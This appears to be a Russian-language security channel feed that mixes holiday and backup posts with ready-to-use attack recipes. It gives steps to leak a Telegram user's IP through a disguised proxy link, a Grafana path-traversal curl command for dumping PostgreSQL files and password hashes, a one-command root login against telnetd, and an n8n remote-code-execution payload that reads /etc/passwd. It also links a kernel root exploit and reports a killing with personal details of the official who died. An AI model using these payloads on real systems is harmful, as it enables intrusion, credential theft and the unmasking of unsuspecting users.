А я напоминаю ☝️: в преддверии ❄️Нового года❄️ некоторые снова начнут распространять свой псиоп📡 против Санты🎅.

Прошу подписчиков быть бдительными 😀 Не поддавайтесь дезинформации в интернете о том, что Санта🎅 «якобы» не существует 😉

Пишите письма📨 Санте🎅, верьте в новогоднее чудо🤲 и не забудьте оставить печенье🍪 и тёплое молоко🥛 под ёлочкой🌲.

Всех с наступающим праздником, любимые подписчики 🎁✨

https://github.com/farazsth98/chronomaly

chronomaly — Kernel LPE exploit для CVE-2025-38352. Работает как на Linux, так и на Android, — полноценный root на всех версиях ядра 5.10.x.

Более подробно:
— Part 1 - In-the-wild Android Kernel Vulnerability Analysis + PoC
— Part 2 - Extending The Race Window Without a Kernel Patch
— Part 3 - Uncovering Chronomaly

Нашли простой способ, как можно слить IP-адрес у ничего не подозревающего собеседника в Telegram, в один клик.

Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку t.me/proxy?server=<LISTENER_IP>&port=<LISTENER_PORT>&secret=random
3. Ждем, пока по ней кликнут, и сразу же получаем IP

Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.

Secrets Patterns Database

Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.

Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.

Дампим PostgreSQL с помощью Path Traversal

Наткнулся на гайд то, как восстановить "убитую" базу данных PostgreSQL. Его суть сводится к тому, что все данные лежат на файловой системе, и все можно довольно легко раскрутить от главного файла global/1262 (pg_database).

Его идентификатор (oid) всегда статический, и это удобно — можно легко достать с помощью Path Traversal. Вот так, на примере CVE-2021-43798 в Grafana:

curl --path-as-is -O http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../var/lib/postgresql/data/global/1262 

А затем, с помощью него и двух бинарей с отношениями и типами данных, base/<db_oid>/1259 и base/<db_oid>/1249 (у каждой базы свой db_oid, его можно достать из pg_database), легко восстановить и содержимое всей базы данных.

С помощью pg_filedump

./pg_filedump -D int,bool,text,timestamp /path/to/db/base/16384/16393

или специальной утилиты pgread, которая автоматизирует рутину

./pgread -passwords all
PostgreSQL Password Hashes:
===========================
pg_database_owner:(no password)
admin:SCRAM-SHA-256$4096:salt$hash:proof [SUPERUSER] [LOGIN]

Что самое главное — не понадобились никакие креды, чтобы сдампить базу.

Еще даже не успели присвоить CVE

В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля.

Под ударом практически все дистрибутивы Linux, которые ставят inetutils-telnetd из репозиториев:
— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet

Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:

$ USER="-f root" telnet -a IP PORT

UPD.: присвоили https://nvd.nist.gov/vuln/detail/CVE-2026-24061

Это Кира, только без тетради

Прямо в проходной здания Роскомнадзора в Москве убит высокопоставленный сотрудник ведомства Алексей Беляев — он отвечал за блокировки сайтов и замедление трафика.

Убийство произошло 19 января: 16-летний школьник Артём ударил чиновника ножом в грудь, когда тот выходил из офиса.

Беляев работал в Роскомнадзоре больше 10 лет, на момент смерти — замначальника отдела контроля и надзора в сфере связи. Этот отдел отвечает за:
— установку и контроль «чёрных ящиков» (ТСПУ), через которые РКН напрямую блокирует YouTube, Discord, VPN и т.д.;
— мониторинг фильтрации трафика и штрафы провайдерам, если запрещённые сайты всё же открываются;
— поиск и блокировку зеркал заблокированных ресурсов;
— замедление трафика для ещё не полностью заблокированных сайтов;

Серия и номер паспорта стали недействительны 19 января 2026 года (в день смерти), а зарплата сотрудника, согласно утечкам, составляла 135 тысяч рублей в месяц.

Как не потерять все

Есть железная схема с тремя копиями:
1. Рабочая (которую используешь каждый день)
2. Локальная (чтобы быстро восстановиться)
3. Удалённая (если сгорела хата)

Хранишь все свои данные на ПК, синкаешь самое важное с NAS или просто внешним диском, и отдельно выгружаешь в облако.

Но какое облако выбрать? В таблице собраны все облачные хранилища, у которых есть lifetime-подписка — один раз платишь и получаешь доступ на всю жизнь.

У каждого есть свои нюансы, — один говорит о "пожизненном доступе" компании, а не тебя, другой удалит все твои файлы через 3 года, если туда не заходить. Здесь все описано, как и самые надежные сервисы, которые выделены зеленым.

Советую сохранить пост, чтобы не потерять. Окупается такое облако примерно за 5 лет, а перед выгрузкой нужно не забыть все зашифровать, например, с помощью Cryptomator.

🔥 [10/10] CVE-2026-25049: RCE в n8n

Это обход для всех предыдущих патчей. Уязвимость позволяет выполнять произвольные команды на сервере.

Уязвимы версии:
— <1.123.17 (исправлено в 1.123.17)
— <2.5.2 (исправлено в 2.5.2)

PoC
1. Создаем workflow
2. Добавляем Edit Field
3. Указываем в String (Expression)

{{(() => {
    const { [`constr${'uct'}or`]: Fn } = Object;
    const payload = "return process.mainModule.require('child_process').execSync('cat /etc/passwd').toString();";
    return Fn(payload)();
})()}}

4. Нажимаем Execute Step